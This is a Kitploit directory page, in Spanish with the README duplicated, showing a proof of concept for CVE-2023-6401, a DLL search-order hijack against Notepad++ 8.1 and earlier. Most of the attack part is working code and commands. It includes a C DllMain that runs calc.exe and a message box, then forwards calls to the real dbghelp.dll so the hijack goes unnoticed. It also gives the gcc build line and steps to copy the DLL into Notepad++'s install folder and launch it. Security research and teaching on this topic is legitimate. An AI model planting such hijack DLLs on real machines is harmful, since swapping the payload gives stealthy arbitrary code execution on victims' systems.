Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6401 — CVE-2023-6401 es una vulnerabilidad de secuestro de DLL que permite a los atacantes ejecutar código arbitrario colocando un archivo `dbghelp.dll` malicioso en el directorio de la aplicación. Este proyecto demuestra la vulnerabilidad y proporciona un PoC reproducible. | Kitploit
Herramientas/GitHubGitHub/mekitoci/cve-2023-6401
Análisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 es una vulnerabilidad de secuestro de DLL que permite a los atacantes ejecutar código arbitrario colocando un archivo `dbghelp.dll` malicioso en el directorio de la aplicación. Este proyecto demuestra la vulnerabilidad y proporciona un PoC reproducible.

Ver Repositorio
17hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-6401 · Prueba de concepto de secuestro de DLL

License Platform

English | 中文


中文

⚠️ Aviso importante: Solo para fines de investigación y educación en seguridad

Prueba de concepto de la vulnerabilidad de secuestro de DLL en NotePad++ ≤ 8.1. Ejecuta código arbitrario colocando un dbghelp.dll malicioso en el directorio de la aplicación.

Inicio rápido

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

Resultado esperado: aparece la calculadora + se muestra un cuadro de mensaje + NotePad++ se inicia con normalidad

Resultado del PoC

Detalles de la vulnerabilidad

ElementoDetalles
Número de CVECVE-2023-6401
Versiones afectadasNotePad++ ≤ 8.1
Tipo de vulnerabilidadSecuestro de DLL / Secuestro del orden de búsqueda
ImpactoEjecución de código arbitrario
Requisitos previosPermiso de escritura en el directorio de la aplicación

Mecanismo

Windows carga las DLL en el siguiente orden:

  1. Directorio de la aplicación (prioridad más alta)
  2. Directorio System32
  3. Directorio de Windows
  4. Directorio actual
  5. Variable de entorno PATH

NotePad++ carga dbghelp.dll al iniciarse. Al colocar una DLL maliciosa con el mismo nombre en el directorio de la aplicación, se puede ejecutar código antes de que se cargue la DLL del sistema.

Implementación técnica

Código principal

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Características clave

  • Secuestro del orden de búsqueda: aprovecha el mecanismo de búsqueda de DLL de Windows
  • Reenvío de API: carga la DLL real y reenvía las llamadas a funciones para mantener la aplicación en funcionamiento normal
  • Sigilo: el usuario no percibe ninguna anomalía

Opciones de compilación

MinGW (Recomendado)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Limpieza

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

Referencias

  • CVE-2023-6401
  • Orden de búsqueda de DLL de Microsoft
  • MITRE ATT&CK T1574.001

Descargo de responsabilidad

Este proyecto se proporciona únicamente con fines educativos y de investigación en seguridad. El usuario es el único responsable de cumplir con las leyes y normativas aplicables.


English

⚠️ AVISO IMPORTANTE: Solo para fines de investigación y educación en seguridad

Prueba de concepto de la vulnerabilidad de secuestro de DLL en NotePad++ ≤ 8.1. Ejecuta código arbitrario colocando un dbghelp.dll malicioso en el directorio de la aplicación.

Inicio rápido

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

Resultado esperado: aparece la calculadora + se muestra un cuadro de mensaje + NotePad++ se inicia con normalidad

Resultado del PoC

Detalles de la vulnerabilidad

ElementoDetalles
Número de CVECVE-2023-6401
Versiones afectadasNotePad++ ≤ 8.1
Tipo de vulnerabilidadSecuestro de DLL / Secuestro del orden de búsqueda
ImpactoEjecución de código arbitrario
Requisitos previosPermiso de escritura en el directorio de la aplicación

Mecanismo

Windows carga las DLL en el siguiente orden:

  1. Directorio de la aplicación (prioridad más alta)
  2. Directorio System32
  3. Directorio de Windows
  4. Directorio actual
  5. Variable de entorno PATH

NotePad++ carga dbghelp.dll al iniciarse. Al colocar una DLL maliciosa con el mismo nombre en el directorio de la aplicación, se puede ejecutar código antes de que se cargue la DLL del sistema.

Implementación técnica

Código principal

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Características clave

  • Secuestro del orden de búsqueda: aprovecha el mecanismo de búsqueda de DLL de Windows
  • Reenvío de API: carga la DLL real y reenvía las llamadas a funciones para mantener la aplicación en funcionamiento normal
  • Sigilo: el usuario no percibe ninguna anomalía

Opciones de compilación

MinGW (Recomendado)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Limpieza

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

Referencias

  • CVE-2023-6401
  • Orden de búsqueda de DLL de Microsoft
  • MITRE ATT&CK T1574.001

Descargo de responsabilidad

Este proyecto se proporciona únicamente con fines educativos y de investigación en seguridad. El usuario es el único responsable de cumplir con las leyes y normativas aplicables.

Descargar herramienta